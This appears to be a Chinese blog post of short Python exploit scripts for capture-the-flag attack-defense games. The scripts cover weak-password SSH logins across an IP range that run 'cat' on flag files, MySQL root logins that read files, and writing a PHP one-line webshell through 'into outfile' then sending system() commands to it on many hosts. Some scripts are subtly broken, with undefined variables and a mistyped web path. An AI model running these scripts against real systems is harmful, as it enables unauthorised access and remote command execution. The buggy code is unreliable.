Contents
  1. 1. ssh弱口令
  2. 2. mysql弱口令
  3. 3. webshell利用

一些很简单漏洞的利用脚本,慢慢积累,持久更新

ssh弱口令

#coding=utf-8
import paramiko

sshc = paramiko.SSHClient()
sshc.set_missing_host_key_policy(paramiko.AutoAddPolicy())

host = "172.16.1."

for i in range(120,131):
    tag = host+str(i)
    print tag
    try:
        try:
            sshc.connect(tag,22,'root','123456',timeout=1)
        except:
            sshc.connect(tag,22,'admin','123456',timeout=1)
        print sshc.exec_command('cat /root/flaginfo*')[1].readlines()
    except:
        print 'time out'

mysql弱口令

mysql读文件

#coding=utf-8
import MySQLdb
host = '172.16.1.'
for i in range(129,131):
    tag = host+str(i)
    print tag+"3306"
    try:
        MySQLdb.connect(tag,3306,'root','root','mysql',timeout=1)
        cur = conn.cursor()
        cur.execute("select load_file('/root/flag.txt')")
        print cur.fetchone()
        cur.close()
    except:
        print 'MYSQL connect out'
conn.commit()
conn.close()

mysql写入一句话木马

#coding=utf-8
import MySQLdb
host = '172.16.1.'
try:
    conn = MySQLdb.connect(host=host,port=3306,user='root',passwd='root',db='mysql',connect_timeout=1)
    cur = conn.cursor()
    cur.execute("""create table sys(cmd text NOT NULL);""")
    cur.execute("""insert into sys(cmd)values("<?php system('cat /root/flaginfo*');?>");""")
    cur.execute("""select * from sys into outfile "/val/www/html/sys.php";""")
    os.system("curl "+tag+"/sys.php")
except:
    print 'Mysql time out'

webshell利用

#!usr/bin/python
import urllib,urllib2
for i in range(1,10):
    tag = 'http://172.16.'+str(i)+'.113/add_book.php'
    data = {"password":"system('cat /flag');"}
    print tag
    try:
        f = urllib2.urlopen(url=tag,data=urllib.urlencode(data),timeout=1)
        flag = f.read()
        print flag[0:40]
    except:
        print 'time out'
Contents
  1. 1. ssh弱口令
  2. 2. mysql弱口令
  3. 3. webshell利用